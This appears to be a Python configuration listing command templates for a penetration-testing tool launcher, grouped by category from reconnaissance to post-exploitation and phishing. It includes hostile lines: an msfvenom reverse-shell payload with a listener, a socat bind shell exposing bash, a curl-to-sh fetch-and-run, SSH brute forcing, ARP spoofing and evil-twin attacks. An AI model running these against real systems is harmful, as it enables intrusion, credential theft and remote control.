CATEGORIES = [
    {
        'name': 'Information Gathering',
        'short': 'INFO GATHER',
        'color': (100, 200, 255),
        'tools': [
            {'name': 'nmap',         'cmd': 'nmap -sV -sC -T4 {target}',                                           'desc': 'Network mapper & service scanner'},
            {'name': 'theHarvester', 'cmd': 'theHarvester -d {target} -b all',                                     'desc': 'Email, subdomain & name harvester'},
            {'name': 'whois',        'cmd': 'whois {target}',                                                       'desc': 'Domain registration lookup'},
            {'name': 'dig',          'cmd': 'dig {target} ANY +noall +answer',                                      'desc': 'DNS query & zone enumeration'},
            {'name': 'amass',        'cmd': 'amass enum -passive -d {target}',                                      'desc': 'Attack surface & subdomain mapper'},
            {'name': 'subfinder',    'cmd': 'subfinder -d {target} -o subs.txt',                                    'desc': 'Fast passive subdomain discovery'},
            {'name': 'shodan',       'cmd': 'shodan host {target}',                                                 'desc': 'IoT / exposed service search'},
            {'name': 'recon-ng',     'cmd': 'recon-ng',                                                             'desc': 'Full-featured recon framework'},
            {'name': 'httpx',        'cmd': 'httpx -u {target} -title -tech-detect -status-code',                  'desc': 'Fast HTTP probing toolkit'},
            {'name': 'wafw00f',      'cmd': 'wafw00f {target}',                                                     'desc': 'WAF detection & fingerprinting'},
        ],
    },
    {
        'name': 'Vulnerability Analysis',
        'short': 'VULN ANALYSIS',
        'color': (255, 100, 100),
        'tools': [
            {'name': 'nuclei',       'cmd': 'nuclei -u {target} -severity medium,high,critical',                   'desc': 'Template-based vulnerability scanner'},
            {'name': 'nmap-vuln',    'cmd': 'nmap --script vuln -p- {target}',                                     'desc': 'Nmap vulnerability NSE scripts'},
            {'name': 'nikto',        'cmd': 'nikto -h {target} -C all',                                            'desc': 'Web server vulnerability scanner'},
            {'name': 'lynis',        'cmd': 'lynis audit system --quick',                                           'desc': 'System hardening & audit tool'},
            {'name': 'openvas',      'cmd': 'gvm-cli --gmp-username admin socket --xml "<get_tasks/>"',            'desc': 'Open vulnerability assessment'},
            {'name': 'legion',       'cmd': 'legion',                                                               'desc': 'Semi-automated network pentest'},
        ],
    },
    {
        'name': 'Web Application Analysis',
        'short': 'WEB APP',
        'color': (255, 200, 50),
        'tools': [
            {'name': 'burpsuite',    'cmd': 'burpsuite',                                                            'desc': 'Web security testing platform'},
            {'name': 'zaproxy',      'cmd': 'zaproxy',                                                              'desc': 'OWASP Zed Attack Proxy'},
            {'name': 'gobuster',     'cmd': 'gobuster dir -u {target} -w /usr/share/wordlists/dirb/common.txt',    'desc': 'Dir & file brute-forcer'},
            {'name': 'ffuf',         'cmd': 'ffuf -u {target}/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 200,301', 'desc': 'Fast web fuzzer'},
            {'name': 'sqlmap',       'cmd': 'sqlmap -u {target} --batch --level=3',                                'desc': 'SQL injection detection & exploitation'},
            {'name': 'xsser',        'cmd': 'xsser --url {target} -g "?q=XSS"',                                   'desc': 'Cross-site scripting framework'},
            {'name': 'wfuzz',        'cmd': 'wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt {target}/FUZZ','desc': 'Web application fuzzer'},
            {'name': 'dirb',         'cmd': 'dirb {target}',                                                       'desc': 'Web content scanner'},
            {'name': 'wpscan',       'cmd': 'wpscan --url {target} --enumerate ap,u',                              'desc': 'WordPress security scanner'},
            {'name': 'whatweb',      'cmd': 'whatweb -a 3 {target}',                                               'desc': 'Web technology fingerprinter'},
        ],
    },
    {
        'name': 'Database Assessment',
        'short': 'DB ASSESS',
        'color': (50, 200, 100),
        'tools': [
            {'name': 'sqlmap',       'cmd': 'sqlmap -u {target} --dbs --batch',                                    'desc': 'SQL injection & DB extraction'},
            {'name': 'nosqlmap',     'cmd': 'nosqlmap',                                                             'desc': 'NoSQL injection & exploitation'},
            {'name': 'odat',         'cmd': 'odat all -s {target} -p 1521',                                        'desc': 'Oracle DB attack tool'},
            {'name': 'mongoaudit',   'cmd': 'mongoaudit',                                                           'desc': 'MongoDB security auditing'},
            {'name': 'psql-enum',    'cmd': 'psql -h {target} -U postgres -c "\\list"',                            'desc': 'PostgreSQL database enum'},
            {'name': 'msf-mssql',    'cmd': 'msfconsole -q -x "use scanner/mssql/mssql_ping; set RHOSTS {target}; run"', 'desc': 'MSSQL scanner via MSF'},
        ],
    },
    {
        'name': 'Password Attacks',
        'short': 'PASSWORDS',
        'color': (255, 80, 200),
        'tools': [
            {'name': 'hashcat',      'cmd': 'hashcat -m 0 {target} /usr/share/wordlists/rockyou.txt',              'desc': 'GPU-accelerated hash cracker'},
            {'name': 'john',         'cmd': 'john --wordlist=/usr/share/wordlists/rockyou.txt {target}',            'desc': 'John the Ripper'},
            {'name': 'hydra',        'cmd': 'hydra -l {user} -P /usr/share/wordlists/rockyou.txt {target} ssh',    'desc': 'Network login brute-forcer'},
            {'name': 'medusa',       'cmd': 'medusa -h {target} -u admin -P /usr/share/wordlists/rockyou.txt -M ssh', 'desc': 'Parallel login auditor'},
            {'name': 'cewl',         'cmd': 'cewl {target} -m 6 -w cewl.txt',                                      'desc': 'Custom wordlist from target site'},
            {'name': 'crunch',       'cmd': 'crunch 8 12 abcdef1234!@ -o wordlist.txt',                             'desc': 'Wordlist generator'},
            {'name': 'cupp',         'cmd': 'cupp -i',                                                              'desc': 'User password profiler'},
        ],
    },
    {
        'name': 'Wireless Attacks',
        'short': 'WIRELESS',
        'color': (100, 255, 220),
        'tools': [
            {'name': 'aircrack-ng',  'cmd': 'aircrack-ng -w /usr/share/wordlists/rockyou.txt {target}',            'desc': 'WEP/WPA/WPA2 cracker'},
            {'name': 'airmon-ng',    'cmd': 'airmon-ng start {target}',                                             'desc': 'Enable monitor mode on interface'},
            {'name': 'airodump-ng',  'cmd': 'airodump-ng {target}',                                                 'desc': 'Packet capture & network scan'},
            {'name': 'wifite',       'cmd': 'wifite --kill',                                                        'desc': 'Automated wireless auditor'},
            {'name': 'reaver',       'cmd': 'reaver -i {target} -b {bssid} -vv',                                   'desc': 'WPS brute-force attack'},
            {'name': 'wifiphisher',  'cmd': 'wifiphisher --essid {target}',                                         'desc': 'Rogue AP / evil twin attack'},
            {'name': 'kismet',       'cmd': 'kismet -c {target}',                                                   'desc': 'Wireless network detector & sniffer'},
        ],
    },
    {
        'name': 'Reverse Engineering',
        'short': 'REV ENG',
        'color': (200, 150, 255),
        'tools': [
            {'name': 'ghidra',       'cmd': 'ghidra',                                                               'desc': 'NSA open-source RE suite'},
            {'name': 'radare2',      'cmd': 'r2 -A {target}',                                                       'desc': 'Portable reverse engineering framework'},
            {'name': 'gdb',          'cmd': 'gdb -q {target}',                                                      'desc': 'GNU debugger (pwndbg-enhanced)'},
            {'name': 'strings',      'cmd': 'strings -n 8 {target}',                                                'desc': 'Extract printable strings from binary'},
            {'name': 'objdump',      'cmd': 'objdump -d -M intel {target}',                                         'desc': 'Disassembler & object file display'},
            {'name': 'ltrace',       'cmd': 'ltrace {target}',                                                      'desc': 'Library call tracer'},
            {'name': 'strace',       'cmd': 'strace -f {target}',                                                   'desc': 'System call tracer'},
            {'name': 'binwalk',      'cmd': 'binwalk --signature {target}',                                         'desc': 'Firmware & binary analysis'},
        ],
    },
    {
        'name': 'Exploitation Tools',
        'short': 'EXPLOIT',
        'color': (255, 60, 60),
        'tools': [
            {'name': 'metasploit',   'cmd': 'msfconsole -q',                                                        'desc': "World's leading exploit framework"},
            {'name': 'msfvenom',     'cmd': 'msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={lhost} LPORT=4444 -f elf > shell.elf', 'desc': 'Payload generator'},
            {'name': 'searchsploit', 'cmd': 'searchsploit {target}',                                                'desc': 'Exploit-DB offline search'},
            {'name': 'pwntools',     'cmd': "python3 -c \"from pwn import *; context.arch='amd64'\"",              'desc': 'CTF & exploit dev framework'},
            {'name': 'beef-xss',     'cmd': 'beef-xss',                                                             'desc': 'Browser exploitation framework'},
            {'name': 'set',          'cmd': 'setoolkit',                                                            'desc': 'Social Engineering Toolkit (SET)'},
        ],
    },
    {
        'name': 'Sniffing & Spoofing',
        'short': 'SNIFF/SPOOF',
        'color': (50, 180, 255),
        'tools': [
            {'name': 'wireshark',    'cmd': 'wireshark',                                                            'desc': 'Network protocol analyser GUI'},
            {'name': 'tcpdump',      'cmd': 'tcpdump -i {target} -w capture.pcap -n',                              'desc': 'CLI packet capture'},
            {'name': 'bettercap',    'cmd': 'bettercap -iface {target}',                                            'desc': 'Swiss army knife MITM tool'},
            {'name': 'responder',    'cmd': 'responder -I {target} -rdw',                                           'desc': 'LLMNR/NBT-NS/mDNS poisoner'},
            {'name': 'mitmproxy',    'cmd': 'mitmproxy --mode transparent',                                         'desc': 'Interactive HTTPS proxy'},
            {'name': 'ettercap',     'cmd': 'ettercap -G',                                                          'desc': 'Man-in-the-middle framework'},
            {'name': 'arpspoof',     'cmd': 'arpspoof -i {target} -t {victim} {gateway}',                          'desc': 'ARP cache poisoning'},
        ],
    },
    {
        'name': 'Post Exploitation',
        'short': 'POST EXPLOIT',
        'color': (255, 120, 0),
        'tools': [
            {'name': 'meterpreter',  'cmd': 'msfconsole -q -x "handler -H 0.0.0.0 -P 4444 -p linux/x86/meterpreter/reverse_tcp"', 'desc': 'In-memory reverse shell'},
            {'name': 'empire',       'cmd': 'powershell-empire server',                                             'desc': 'PowerShell post-exploitation C2'},
            {'name': 'bloodhound',   'cmd': 'bloodhound',                                                           'desc': 'Active Directory attack path analyser'},
            {'name': 'linpeas',      'cmd': 'curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh', 'desc': 'Linux privesc auditor'},
            {'name': 'chisel',       'cmd': 'chisel server --reverse --port 8080',                                  'desc': 'Fast TCP/UDP tunnel over HTTP'},
            {'name': 'socat',        'cmd': 'socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash',                  'desc': 'Multipurpose relay tool'},
            {'name': 'winpeas',      'cmd': 'winpeas.exe',                                                          'desc': 'Windows privilege escalation auditor'},
        ],
    },
    {
        'name': 'Forensics',
        'short': 'FORENSICS',
        'color': (200, 255, 150),
        'tools': [
            {'name': 'autopsy',      'cmd': 'autopsy',                                                              'desc': 'Digital forensics platform'},
            {'name': 'volatility3',  'cmd': 'vol -f {target} windows.pslist',                                       'desc': 'Memory forensics framework'},
            {'name': 'binwalk',      'cmd': 'binwalk -e {target}',                                                  'desc': 'Firmware extraction & analysis'},
            {'name': 'foremost',     'cmd': 'foremost -i {target} -o recovered/',                                   'desc': 'File carving / recovery tool'},
            {'name': 'exiftool',     'cmd': 'exiftool {target}',                                                    'desc': 'Metadata reader & writer'},
            {'name': 'bulk_extractor','cmd': 'bulk_extractor -o output/ {target}',                                  'desc': 'High-performance forensic scanner'},
            {'name': 'dd',           'cmd': 'dd if={target} of=image.dd bs=4M status=progress',                     'desc': 'Bit-for-bit disk image capture'},
            {'name': 'hashdeep',     'cmd': 'hashdeep -r {target}',                                                 'desc': 'Recursive hash auditing'},
        ],
    },
    {
        'name': 'Reporting Tools',
        'short': 'REPORTING',
        'color': (150, 255, 200),
        'tools': [
            {'name': 'dradis',       'cmd': 'dradis',                                                               'desc': 'Collaborative reporting platform'},
            {'name': 'faraday',      'cmd': 'faraday-client',                                                       'desc': 'Pentest IDE with reporting'},
            {'name': 'cherrytree',   'cmd': 'cherrytree',                                                           'desc': 'Hierarchical note-taking'},
            {'name': 'metagoofil',   'cmd': 'metagoofil -d {target} -t pdf,doc,xls -o output/',                    'desc': 'Metadata extractor from public docs'},
            {'name': 'maltego',      'cmd': 'maltego',                                                              'desc': 'Visual investigation & link analysis'},
            {'name': 'libreoffice',  'cmd': 'libreoffice --writer',                                                 'desc': 'Professional document / report writing'},
        ],
    },
    {
        'name': 'Social Engineering Tools',
        'short': 'SOC ENG',
        'color': (255, 180, 100),
        'tools': [
            {'name': 'setoolkit',    'cmd': 'setoolkit',                                                            'desc': 'Social Engineering Toolkit (SET)'},
            {'name': 'gophish',      'cmd': 'gophish',                                                              'desc': 'Open-source phishing campaign framework'},
            {'name': 'evilginx2',    'cmd': 'evilginx2',                                                            'desc': 'Reverse proxy phishing framework'},
            {'name': 'beef-xss',     'cmd': 'beef-xss',                                                             'desc': 'Browser hooking via XSS'},
            {'name': 'king-phisher', 'cmd': 'king-phisher',                                                         'desc': 'Phishing campaign management'},
        ],
    },
    {
        'name': 'AI Assistant',
        'short': 'AI ASSIST',
        'color': (180, 100, 255),
        'tools': [],  # handled specially — shows notes & stats panel
    },
]
